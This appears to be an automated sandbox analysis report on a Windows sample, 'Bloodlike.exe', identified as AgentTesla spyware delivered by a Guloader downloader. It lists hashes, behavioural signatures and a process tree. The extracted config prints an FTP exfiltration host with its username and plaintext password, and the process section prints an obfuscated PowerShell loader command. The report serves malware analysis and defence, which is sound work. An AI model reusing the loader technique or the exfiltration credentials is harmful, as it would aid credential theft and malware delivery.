Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
19-09-2024 06:47
Static task
static1
Behavioral task
behavioral1
Sample
Bloodlike.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Bloodlike.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240802-en
General
-
Target
Bloodlike.exe
-
Size
750KB
-
MD5
3471130ee839f6cba7abaf6111fa2d95
-
SHA1
7a2222ba4034d054e6f976835e4139286f1d3d00
-
SHA256
2147f70eb8ebf3d80eef30e2e6e9d75758294682d052a954af53510087bfa512
-
SHA512
d6a93951f206174472377faf0b20df7fd5638389f4489b310d2679b91b3e6dba36a98dccd6f000adfbe3546238d90cb6813410b1dc3b1b355ee934dac79b7d02
-
SSDEEP
12288:lXZEFyI2w//6CDquAh67/bAAkh9B9LbtS+OWbhxIK0Hc0CeD43JZHVDwrG8qjWK3:lXeFbRqkGhg/sJTthtOWb4riRVmqjWJ6
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://mail.hearing-vision.com - Port:
21 - Username:
[email protected] - Password:
LILKOOLL14!
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Loads dropped DLL 1 IoCs
pid Process 388 Bloodlike.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 ip-api.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\androsporangium.Pan Bloodlike.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1620 wabmig.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3036 powershell.exe 1620 wabmig.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3036 set thread context of 1620 3036 powershell.exe 92 -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\resources\dlgsmaalets.him Bloodlike.exe File opened for modification C:\Windows\Fonts\evenworthy.ini Bloodlike.exe -
pid Process 3036 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bloodlike.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wabmig.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3036 powershell.exe 3036 powershell.exe 3036 powershell.exe 3036 powershell.exe 3036 powershell.exe 3036 powershell.exe 3036 powershell.exe 3036 powershell.exe 3036 powershell.exe 1620 wabmig.exe 1620 wabmig.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3036 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3036 powershell.exe Token: SeDebugPrivilege 1620 wabmig.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 388 wrote to memory of 3036 388 Bloodlike.exe 83 PID 388 wrote to memory of 3036 388 Bloodlike.exe 83 PID 388 wrote to memory of 3036 388 Bloodlike.exe 83 PID 3036 wrote to memory of 1620 3036 powershell.exe 92 PID 3036 wrote to memory of 1620 3036 powershell.exe 92 PID 3036 wrote to memory of 1620 3036 powershell.exe 92 PID 3036 wrote to memory of 1620 3036 powershell.exe 92 PID 3036 wrote to memory of 1620 3036 powershell.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\Bloodlike.exe"C:\Users\Admin\AppData\Local\Temp\Bloodlike.exe"1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Slutnoters=Get-Content 'C:\Users\Admin\AppData\Local\Thundershowers\Immortalizes65\Hedgehopper\Sylvette.Far';$Gibbus126=$Slutnoters.SubString(55230,3);.$Gibbus126($Slutnoters)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Program Files (x86)\windows mail\wabmig.exe"C:\Program Files (x86)\windows mail\wabmig.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD511092c1d3fbb449a60695c44f9f3d183
SHA1b89d614755f2e943df4d510d87a7fc1a3bcf5a33
SHA2562cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77
SHA512c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a
-
Filesize
343KB
MD5d80ac4e6087f5cd78fd62ef4711a0ef1
SHA1dfd8dfd8e653a57e27cc6a91d53fc67ef21e1cbb
SHA2566cbd0ef064238112f95d026016ffb65acb8193b8f53e2c772a7df23e01b9ec58
SHA512c71ab3a8856e6f3190d9fd8ff01c4802bb0d99633cdffb8e25e2070a314ad4f4f37b97d76cb1fa561df4689955a25683e9f096c4a733158f45110290fdc6571e
-
Filesize
54KB
MD5709c3273ccbcb96a895a16c022896d05
SHA12a3358ebc52ec8aad2c4c4cbf07ed18fa04ccfbd
SHA25698c9db4a96c358a5c26b05fff3757b33a090f5e11c765aabdbf1308dfc2806fc
SHA512a01915cb73f1afc1c249b1d9e6a48007790fad4c890a23057a626f19b4e3049245a218044f30828ba007dadf670eb28f2c0eb9c3d989cd78c31b445394e1f036